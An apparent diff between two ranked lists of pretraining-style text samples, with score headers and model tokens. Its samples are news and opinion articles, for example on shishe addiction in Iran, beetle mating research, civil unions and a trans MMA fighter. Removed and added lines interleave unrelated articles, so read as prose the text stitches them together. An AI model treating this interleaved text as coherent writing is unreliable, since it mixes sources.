should any species waste all that effort on sons?” -A top official from the Iran Drug Control Headquarters said last year that shishe could be found in Tehran in “less than five minutes,” according to the Iranian Students’ News Agency. +The answer, revealed this week, is more basic that you might think. -Shishe addicts in Iran are mostly urban, middle class and young, experts say. Notably, there are a large number of women who abuse shishe, too. +“We wanted to understand how Darwinian selection can allow this widespread and seemingly wasteful reproductive system to persist, when a system where all individuals produce offspring without sex — as in all-female asexual populations — would be a far more effective route to reproduce greater numbers of offspring. -One of the main reasons why shishe use has spread quickly in Iran is a lack of information about the drug, which has led casual users to believe, erroneously, that it is not addictive, experts say. +His research, funded by the Natural Environment Research Council, showed competition among males helped produce the healthiest offspring and the absence of sex could lead to mutation among offspring and eventual extinction. -Struggling university students have begun abusing it to stay up longer and try to boost their performance in school. Women have been sold the drug in beauty salons with the promise that it will help them lose weight, according to local media reports. +“To be good at out-competing rivals and attracting partners in the struggle to reproduce, an individual has to be good at most things, so sexual selection provides an important and effective filter to maintain and improve population genetic health,” prof. Gage said. -“We really had a hard time convincing people that this is addiction,” said Azaraksh Mokri, a psychiatrist who teaches at the Tehran University of Medical Sciences and has dealt extensively with the issue of shishe addiction. +“Our findings provide direct support for the idea that sex persists as a dominant mode of reproduction because it allows sexual selection to provide these important genetic benefits. -Opium addiction has long been a problem in Iran partly because of a tolerance for its use even in conservative rural areas, and also because of the country’s long border with Afghanistan, for decades one of the top opium producers. Opium is still the most abused drug in Iran, according to official statistics. +“In the absence of sex, populations accumulate deleterious mutations through a ratcheting effect where each new mutation takes a population closer to extinction. -Shishe began to make inroads in the country about a decade ago, luring users who preferred its effects as a stimulant to the more soporific opium, which was seen as a drug of the poor and elderly. +What if there were fewer males? The researchers tested the theory that a more efficient form of reproduction would involve females giving birth to more females. -That shift has been characterized as a change between drugs which are known as sonati, or -================================================================================ -Rank = 92; Score = 262144.0 -<|begin_of_text|>Mother-son love dominates households the world over, but especially in India. (Ask anyone married to a desi man if she feels like the other woman.) One of the standout episodes of Room 104, the new Duplass-helmed HBO series, makes great use of this phenomenon. Titled “The Internet,” it’s set in 1997. Our only visible character, a harried, wannabe novelist, is locked for nearly the full half-hour in a phone call with his mom. Anish needs his manuscript sent to him, in a bad way. He’s got a life-changing meeting with an agent coming up, a book to finish, and of course, he forgot his laptop. Actor Karan Soni paces the dinky motel room for which the series is named in a sweat, walking his oblivious mom through the mechanics of email with a growing frustration in his voice that betrays just how deep their relationship is. +To find out if that might work, researchers took tribolium flour beetles and paired them with different numbers of males. + +Over 10 years they paired 90 males with only 10 females. They then paired single males and females in monogamous pairings. -Featuring only Soni and Poorna Jagannathan as his mother, the scene manages to do a lot with a little. From nearly her first line, Jagannathan establishes her character as one we haven’t seen rendered so well before: the loving but passive-aggressive, alternately icy, and helicoptering desi mom. Jagannathan’s character seems almost at times to be trolling Anish, so hypnotically layered is her cadence. To pull it off, Jagannathan told Vulture by email, she channeled her own, super-sweet mom, as well as her split attitude toward her 11-year-old son. When he talks, “There’s a part of you that is in wonder and amazement and so much love, and then there’s a part that’s totally bored and needs to just reach for the wine.” +“Our monogamous treatment, for example, where there was no sexual selection for 50 generations, resulted in a lower level of population health and rapid extinction when populations were challenged by inbreeding. All the populations derived from monogamous histories became extinct after just eight generations,” prof. Gage said. -Both actors were born in India — Soni in New Delhi to a middle-class family, while Jagannathan is the daughter of a diplomat. Her accent gives away the upper-crust, Brit-lite India that she belongs to, though her character’s origins are notably humble. But that inconsistency doesn’t detract from her possession of the role. The Duplasses are known for encouraging improvisation, and she sprinkles her rejoinders with “beta” and “raja” — the latter, meaning prince, less known than the former, which means son. The episode — not written with Indians in mind — wasn’t meant to be a model of representational politics at work. Soni took the part a day before shooting, after the +By contrast, populations where males had to compete for female attention maintained population health and avoided extinction ================================================================================ -Rank = 93; Score = 262144.0 -<|begin_of_text|>Cultural criticism is taboo. In polite company, all cultures are created equally. None is better or worse than any other; they’re just different. We aren’t responsible for the culture we were born into, so there’s no objective basis for criticism or judgement. +Rank = 93; Score = 120832.0 +<|begin_of_text|>Civil unions are an inadequate substitute for marriage. Creating a separate, new legal structure to confer some benefits on same-sex couples neither honors American ideals of fairness, nor does it grant true equality. The results are clearly visible in New Jersey, which continues to deny same-sex couples some of the tangible civil benefits that come with marriage. -In progressive ideology, this idea goes a step further. Not only must we respect all cultural differences, we mustn’t stray outside the norms of the culture we were born into. A white woman with dreadlocks, for example, should respect black culture and shave her hair off, rather than “steal” a hairstyle from a different culture. They even have a special word for this grievance: cultural appropriation. +Gov. Jon Corzine of New Jersey has long said that he would sign a measure granting the right to marry to couples of the same sex. We are heartened that he has declared that that should happen sooner rather than later. -I think cultural appropriation is a load of baloney, based on the most persistent errors in political/social thought: abstraction errors – misunderstanding the relationship between people and labels, between aggregates and concretes. These errors are not only imprecise, but they are counter-productive, divisive, and downright dangerous. +We hope Mr. Corzine intends to prod legislators into passing such a law early in the 2009 session. That would make New Jersey the first state to legalize marriage for same-sex couples through legislative action. Three other states — Connecticut, Massachusetts and California — have done so through the courts. Unfortunately, California voters approved a ballot measure in November rescinding that right, at least for now. -Equal Equivocation +Mr. Corzine made his statement after a state commission released its final report on New Jersey’s two-year-old civil union law. The commission noted the hurt and stigma inflicted by shutting out gay people from the institution of marriage. It also found that civil unions do not assure gay couples of the same protections, including the right to collect benefits under a partner’s health insurance program and to make medical decisions on behalf of a partner who is unable to do so. The panel concluded unanimously that the state should enact a law to remove the inequities. -The first abstraction error goes like this, “All differences between people are benign differences. Some people are born with light hair; others with dark hair. Neither is superior to the other. In the same way, all cultural differences are benign. Some cultures value monogamy; others are more sexually liberal. Neither is superior to the other.” +We regret that the leaders of the state’s Democratic-controlled Legislature do not view this issue with the same urgency. Senate President Richard Codey, for instance, said recently that progress in civil rights areas “is typically achieved in incremental steps.” We suspect that political expedience is clouding Mr. Codey’s sense of fairness. Next year in New Jersey, the governorship and all seats in the Assembly are up for grabs in an election. Some Republicans already are talking about making their opposition to same-sex marriage a campaign issue. -This concept is applied across the board. Some cultures are more religious; some value education more highly; some are more hierarchical, etc. These differences should not be judged, any more than we should judge somebody for their height or the amount of freckles on their face. +Governor Corzine typically takes the right side on important issues, but he has been known to retreat in the face of opposition. We hope that’s not the case here. It’s past time for him and for the Democrats in Trenton to find the political courage to extend the right to marry to gay couples.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 120832.0 +<|begin_of_text|>Executive orders issued by Presidents of the United States to help officers and agencies of the executive branch manage operations within the government. -Then, the story goes, because all cultures are essentially equal, any differences in the socio-economic status of ethnic groups must be a function of discrimination. Without racism or discrimination, all cultures would be equally represented across the socio-economic spectrum. +At the federal level of government in the United States, laws are made almost exclusively by legislation. Such legislation originates as an Act of Congress passed by the United States Congress; such acts were either signed into law by the President or passed by Congress after a presidential veto. -In reality, we’ve no reason to believe this is true. Nowhere in the world – nowhere in history – are all cultures represented equally across the socio-economic spectrum. The idea is an appealing, aesthetic one, no doubt, but it’s not grounded in the real world. +However, legislation is not the only source of regulations. There is also judge-made common law and constitutional law. The President can issue executive orders pursuant to a grant of discretion from Congress, or under the inherent powers that office holds to deal with certain matters which have the force of law. -Different cultures value different things; some skills are valued more highly than others; throughout the world, Chinese immigrants tend to have the highest average income of any demographic. Why is this? It’s not because they are genetically superior; it’s not because of pro-Chinese discrimination (in fact, it’s largely despite negative discrimination); it’s because Chinese culture heavily emphasizes academic performance in the hard sciences, and the hard +Many early executive orders were not recorded. The State Department began numbering executive orders in the early 20th century, starting retroactively from President Abraham Lincoln's Executive Order Establishing a Provisional Court in Louisiana issued in 1862.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 94; Score = 260096.0 -<|begin_of_text|>4K has arrived; 4K has a long way to go. The next standard in TV and monitor resolutions has started to trickle into electronics showrooms, hoping to tantalize shoppers into taking a very, very high-res plunge, but the resolution standard doesn't come with much to watch. +Rank = 95; Score = 120832.0 +<|begin_of_text|>MMA’s first openly trans athlete still encounters prejudice inside and outside the sport and says media are partly to blame: ‘We don’t tell people to write stories in respectful ways’ + +An athlete and a transgender person – that both identities could be conceivable fascinates our media landscape, from the New York Post all the way up to the New York Times. This is perhaps why speculation about Bruce Jenner’s gender identity has been disappointingly rife in recent weeks, even though the athlete has not spoken out about it. + +Fallon Fox knows what it’s like to be the focus of rumours and hearsay. She is a mixed martial arts (MMA) fighter – and the first openly trans athlete in the sport’s history. + +Fox is intimately familiar with our culture’s treatment of trans athletes. She was not out publicly when she began competing, although licensing commissions knew she was trans. But after Fox began winning, a reporter called her and made it clear he knew she was trans. Fox understood she had to get ahead of the story, so she came out in an Outsports article in March 2013. -Specs at a glance: Toshiba P50t-BST2N01 Screen 3840×2160 at 15.6" (282 ppi) OS Windows 8.1 64-bit CPU 2.4GHz Intel Core i7-4700HQ RAM 16GB 1600MHz DDR3L (two slots, 16GB max) GPU AMD Radeon R9 M265X with 2GB dedicated GDDR5 memory, Intel HD Graphics 4600 (integrated) HDD 1TB hybrid drive with 8GB NAND flash Networking Dual-band 802.11agn, Bluetooth 4.0 Optical Pre-built DVD SuperMulti drive (Blu-ray rewriteable drive available in alternate fixed configuration) Ports 4x USB 3.0, HDMI, card reader, headphone jack, microphone jack Size 14.9 × 9.6 × 1.1" Weight 5.2 lbs Battery 4-cell Li-polymer Warranty 1 year Starting price $1,799.99 Other perks Webcam, Technicolor specification, multi-touch display, Adobe Photoshop Lightroom 5 +When I ask Fox about the obsessive interest in an athlete’s transition, she brings up the retrogressive idea that, despite the fact that there are actually many female athletes, sports are men’s domain. This leads people to see Jenner’s athletic abilities as a sign of maleness, making the possibility that Jenner might be trans a contradiction to gawk at. + +Fallon Fox: ‘I want to bring my people with me.’ Photograph: Rhys Harper -Just as 3D TVs and monitors had a tough enough time getting our attention, 4K is still hobbled by a severe lack of content in its 3840×2160 resolution. TV buyers may lose interest once they burn through the limited films and series available on smart sets' download and streaming services. Computer users, however, have had more reasons to tiptoe toward the quadrupling of 1080p—at the very least, to enjoy super-crisp text and details in their regular work and browsing. +I ask Fox about being put in the position of having to come out publicly so early in her career. “That sucked. I expected that someone was going to out me; you just can’t go through life with a microscope on your career without someone delving into your past a little bit,” she says. “But it’s something you really can’t prepare yourself for.” Her face grows serious. “The scope of anger and vitriol that I received initially... That was disheartening, tragic. It was mind-blowing.” -Displays as dense as 2880×1800 and 3200×1800 have already landed in our laps, but Toshiba has come out as the first legitimate 4K laptop producer. The P50t Satellite's biggest selling point is its 15.6", 3840x2160 resolution screen—a multi-touch panel, at that—and it's backed with the specs you'd expect from a machine forced to render so many pixels. +This is not how Fox wanted her career to go. Her dream narrative would have been for her to go in there just like any other fighter would, collecting wins, hopefully ending up the best female fighter on the face of the planet. “I suppose I’d like all of that still,” she says pensively. “But in addition to that, I want to bring my people with me.” -Without a 4K media landscape to latch onto, however, Toshiba instead has to position this device as a creative +Fox’s interest in MMA stemmed from the fact that ================================================================================ -Rank = 95; Score = 259072.0 -<|begin_of_text|>Class warfare is for real, and it’s time to pick a side. You could throw in with the chateau dwellers, but chances are you’re with everyone else. As the war of whines has progressed, not every 1%er is content falling into their allotted box, and some have stepped forward to prove they’re just regular folks like the rest of us. Here are their stories. +Rank = 96; Score = 120320.0 +<|begin_of_text|>The world of work for women is changing. A popular new Barbie construction set — yes, building pink mansions! — may help girls expand their view of what occupations are open to them, and that's welcome. But tradeswomen are taking action today: President Obama will soon be hearing from women electricians, plumbers, ironworkers, and carpenters about what it takes to succeed in the world of skilled trades work. + +In April over 650 tradeswomen gathered in Sacramento, California, for the “Annual Women Build California and the Nation Conference.” Iron workers and plumbers met with carpenters, electricians, and laborers. They cheered women leaders like Liz Shuler, Secretary Treasurer of the AFL-CIO; the first woman and the youngest person ever elected to that position. The women listened to Ed Hill, president of the International Brotherhood of Electrical Workers, who called for equal treatment on the job site and in the union hall. Cement mason Alise Martiny, business manager of the Greater Kansas City Building Trades Council, offered her story of women’s leadership. These women are “leaning in" in ways Facebook COO Sheryl Sandberg might not imagine. For one weekend tradeswomen from all over the country shared their stories and learned from each other. Most return to worksites where they are the only woman. The isolation of their day-to-day work lives is in stark contrast to the gathering. + +Some of these women are brand new apprentices, others are seasoned journey-level workers, the most skilled in their trade. Some have become apprenticeship directors and union officers. These are women who work alongside men to build our houses and hospitals, our bridges and roads, to connect our power lines and solar panels. They work with their hands and their heads. The jobs are demanding, rewarding, and often dangerous. -Alec Baldwin +But why are there still so few tradeswomen? What can be done to make these highly skilled, good paying jobs available to more women? -Image Source +Thirty-five years ago, President Jimmy Carter expanded Executive Order 11246 to prohibit sex discrimination in employment by government contractors. He established goals and timetables and outlined ways to reach out to recruit and train women for all jobs. An early goal was for women to be 6.9 percent of the workforce on federally funded construction projects. -How can you say you support the Occupy movement while you stay in Capital One Bank’s commercials? That’s like saying you support the Occupy movement and getting caught having sex with Mitt Romney. Baldwin went as far as to wax poetic on the Huffington Post about the Occupy movement and a DOCUMENTARY HE SAW that was about unemployed people in Long Island. He highly recommends it. Baldwin also called out the “excessive fees forced on customers by certain banks” (“come to Capital One, we’d never do that! We’re totally not one of the least-trusted banks in America.“) and pointed out that Occupy Wall Street “talks a lot, too much in fact, about One Percent versus Ninety Nine Percent.” That’s why we need you Alec, to show us into the light of Capital One bank. +The Office of Federal Contract Compliance Programs was established to oversee the enforcement process within the Department of Labor. There was active outreach, training, and oversight. Women began to enter apprenticeship programs. When Ronald Reagan was elected president in 1980 the +================================================================================ +Rank = 97; Score = 119808.0 +<|begin_of_text|>Polar bear hairs are hollow to maximize insulating qualities of the animals' fur, as almost every student of the Arctic knows. -Jay-Z +But now a set of studies from China shows polar bear hairs are much more than simple tiny tubes. -Image Source +Detailed mathematical analysis of the hairs, published in the journal Thermal Science, finds they have complex structures that make them much better insulators than simple hollow hairs would be. -Even though the crack game got him started in the rap game, Jay-Z (Shawn Carter) has been living in the mogul world for quite some time. The man openly brags about having watches he hasn’t seen in months and an apartment at the Trump he only slept in once. So when he put out T-shirts through his Rocawear clothing line which read “Occupy All Streets”, the streets took offense. Especially when it was revealed that none of the proceeds from the shirts would go to the Occupy movement. Young Hov! +Microscopic examination of polar bear hairs reveals their interior is a structure of membrane pores, researchers from several Chinese universities have found. The latest analysis finds the pore structure is arranged as a fractal, a series of repeating patterns spun off into smaller dimensions. -Kanye West +Calculation of the pore structure finds the ratio of its dimensions to be close to a mathematical figure known as the "golden mean," the ideal dimension ratio for an infinitely spiraling fractal, says one study. The dimension ratio of the inner structure of the analyzed polar-bear hair was calculated at 1.625, close to the golden mean, which is also called Phi and is approximately 1.618; the golden mean "must reveal the possible optimal structure of polar bear hairs," the study says. -Image Source +Though it appears white, polar bear fur is translucent, helping it absorb environmental heat, the study points out. Without the interior pores' fractal arrangement, however, the translucent hair that absorbs light could easily send heat back out into the environment, the study says. -“Kanye West does not care about poor people,” – every person on earth. +A related study, with some of the same co-authors, calculates the equation for one-dimensional heat conduction through each "labyrinth cavity" of the hair. The authors used calculus to arrive at a differential equation showing how heat moves through the hairs. -Kanye West is already pretty well liked in America, but his charitable ways know no bounds. Following in “Big Brother” Jay-Z’s footsteps, Kanye West also decided to show his support for the Occupy movement by showing up once for a few minutes. Reports from the protest described Kanye as uncharacteristically “demure” despite the authentic gold chains he wore, in an unintentionally hilarious show of support. He was also accompanied by another filthy rich hip-hop mogul, which brings us to… +The studies -- the latest in a series on the same subject by the same group of Chinese researchers -- are not mere academic exercises. -Russell Simmons +Understanding the structure and workings of polar-bear hairs "may find many potential applications in the future, especially in thermal insulation designs for extreme cases," said an earlier study by some of the same authors, published in 2011 in Thermal Science. -Image Source +They note in their studies that polar bears maintain body temperatures of 98.6 degrees in an environment where temperatures can dip as low as minus 76 degrees. -Author of the grotesquely titled Super Rich: A Guide To Having It +The Chinese researchers are not alone in looking to polar-bear hair as a model for future heat-collecting and heat-holding products.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 96; Score = 259072.0 +Rank = 98; Score = 118784.0 <|begin_of_text|>Why are so few novelists from working class backgrounds? And why does it matter who gets to write novels and get them published? Author Kit de Waal investigates. "The more we reinforce the stereotypes of who writes and who reads, the more the notion of exclusivity is reinforced. It takes balls to gatecrash a party." @@ -1736,49 +1752,49 @@ Kit talks to a range of writers, agents and publishers about what the barriers a Produced by Mair Bosworth.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 97; Score = 259072.0 -<|begin_of_text|>MMA’s first openly trans athlete still encounters prejudice inside and outside the sport and says media are partly to blame: ‘We don’t tell people to write stories in respectful ways’ +Rank = 99; Score = 117248.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Independent schools 'inadequate' say Ofsted -An athlete and a transgender person – that both identities could be conceivable fascinates our media landscape, from the New York Post all the way up to the New York Times. This is perhaps why speculation about Bruce Jenner’s gender identity has been disappointingly rife in recent weeks, even though the athlete has not spoken out about it. +Pupils at six small Muslim private schools in east London are at risk of extremist views and radicalisation, says Ofsted's chief inspector. -Fallon Fox knows what it’s like to be the focus of rumours and hearsay. She is a mixed martial arts (MMA) fighter – and the first openly trans athlete in the sport’s history. +Sir Michael Wilshaw said the pupils' "physical and educational welfare is at serious risk" following a series of emergency inspections. -Fox is intimately familiar with our culture’s treatment of trans athletes. She was not out publicly when she began competing, although licensing commissions knew she was trans. But after Fox began winning, a reporter called her and made it clear he knew she was trans. Fox understood she had to get ahead of the story, so she came out in an Outsports article in March 2013. +He said all the schools focused too heavily on Islamic teachings. -When I ask Fox about the obsessive interest in an athlete’s transition, she brings up the retrogressive idea that, despite the fact that there are actually many female athletes, sports are men’s domain. This leads people to see Jenner’s athletic abilities as a sign of maleness, making the possibility that Jenner might be trans a contradiction to gawk at. +One of the schools called Ofsted "unprofessional", while another said its findings did not reflect reality. -Fallon Fox: ‘I want to bring my people with me.’ Photograph: Rhys Harper +Education Secretary Nicky Morgan says the schools will be closed down if changes are not made quickly. -I ask Fox about being put in the position of having to come out publicly so early in her career. “That sucked. I expected that someone was going to out me; you just can’t go through life with a microscope on your career without someone delving into your past a little bit,” she says. “But it’s something you really can’t prepare yourself for.” Her face grows serious. “The scope of anger and vitriol that I received initially... That was disheartening, tragic. It was mind-blowing.” +"We asked Ofsted to carry out these independent school inspections and the findings are very concerning," she said. -This is not how Fox wanted her career to go. Her dream narrative would have been for her to go in there just like any other fighter would, collecting wins, hopefully ending up the best female fighter on the face of the planet. “I suppose I’d like all of that still,” she says pensively. “But in addition to that, I want to bring my people with me.” +"While there is no suggestion of a co-ordinated plot, it is clear that these schools are failing children and this is unacceptable. -Fox’s interest in MMA stemmed from the fact that -================================================================================ -Rank = 98; Score = 258048.0 -<|begin_of_text|>Pray that ‘The Handmaid’s Tale’ stays fiction. Because a world where women are denied their humanity isn’t worth living in. +Women stay at home and clean and look after the children Mazahirul Uloom students -Whenever I buy a book, I have this (good?) habit of writing my name and the date on the flyleaf. In the case of The Handmaid’s Tale, the fading scrawl on the yellowing pages in my copy tells me I bought it in February, 2003, and I clearly remember reading it with due alacrity, for I was told by people more well-read and aware than I that it was a must-read, science fiction or otherwise. A dystopian classic that’s spoken of in the same breath as Orwell’s 1984, Huxley’s Brave New World and Bradbury’s Fahrenheit 451, but with a predominant feminist theme. +"All schools must prepare children for life in modern Britain." -And I was hooked from the first page, and horrified as that bleak and terrifying world revealed itself, page by page. +'Serious risk' -A world where women are denied their humanity, and their bodies are merely vessels for reproduction. Consent doesn’t come into the picture. A world where selective reading of holy books guides the government, and patriarchy is at the root of all laws. +At one school, inspectors found pupils did not know the difference between sharia and British law. -And that’s just the beginning. It’s a truly harrowing world that Atwood has created. +And they said the curriculum at Mazahirul Uloom School in Tower Hamlets "focused solely" on Islamic themes. -I finished the book but it stayed with me, at least in its broad contours, as the years rolled by. Events took place in our world that kept taking me back to the world of The Handmaid’s Tale. The rise of the Taliban and their restrictions on women. Global warming, rapid climate change and toxic pollution. The Fukushima nuclear disaster. The death of Savita Halappanavar in the Republic of Ireland because she was denied an abortion under Catholic laws. The rise and rise of Islamophobia. The weaponisation of religion and misogyny. The fight for equal rights for women and marches for women’s rights. And more recently, the meteoric rise of conservatism in the West and Americans talking about fleeing to Canada. +In a letter to Ms Morgan, Sir Michael said he was "extremely concerned about the large number of failings" in each of the six schools and was "not convinced" current managers were capable of making necessary improvements. -That’s why, for a book written in 1985, The Handmaid’s Tale feels eerily contemporary; nay, all too real and very ‘today’ (with my memory refreshed by a re-read this week). Perhaps not surprising when you come to know that while writing the book, Atwood made it a rule for herself to only include events that have happened in history and could — very plausibly — happen overnight within the ambit of existing laws and social mores, and for which the technology did not already exist. -================================================================================ -Rank = 99; Score = 257024.0 -<|begin_of_text|>Women who seek leadership roles in business often face the prospect, whether real or perceived, of having to choose between nurturing their careers or building a robust family and personal life. The publication in March of Lean In: Women, Work and the Will to Lead, by Sheryl Sandberg, Facebook’s chief operating officer, inspired a renewed debate about feminism. It suggested in a strong, if controversial, fashion that women can have it all. +"I believe that, in all six schools, pupils' physical and educational welfare is at serious risk," he wrote. -The confidence and authority that are required of leaders play a role in making choices about how to integrate work and other aspects of life, participants said at a panel titled, “How to be the Champion of Your Own Career,” at the recent Wharton Women in Business conference. Moderated by Arnold J. Rosoff, an emeritus professor of legal studies and business ethics at Wharton, the five-person panel was one of the conference’s first ever to include both men and women. +"Given the evidence gathered from these inspections, particularly in relation to the narrowness of the curriculum, I am concerned that pupils in these schools may be vulnerable to extremist influences and radicalisation." -Early in the discussion, J.J. Cutler, executive vice president of Aramark, invoked the title of the panel and sought to broaden the subject. “I would be very thoughtful about how you define ‘career,’” he said. “Instead of thinking about being a champion of a career, I’d think about just being a champion of your life. In particular, I would be very thoughtful — and it will change over time — about what role you want work and career to play in your overall life. +Analysis -“Be really flexible,” Cutler added. “Your life is likely going to get messier and more complicated, and the world is going to get more complicated from here on out.… Creating a vision for yourself is great, but I would be careful about [making] too many hard and fast rules and plans.” +Image caption Sir Michael Wilshaw said he was extremely concerned -Creating a vision for yourself is great, but I would be careful about [making] too many hard and fast rules and plans.”— J.J. Cutler +By Caroline Wyatt, BBC religious affairs correspondent -Picking the right partner, Cutler said, is 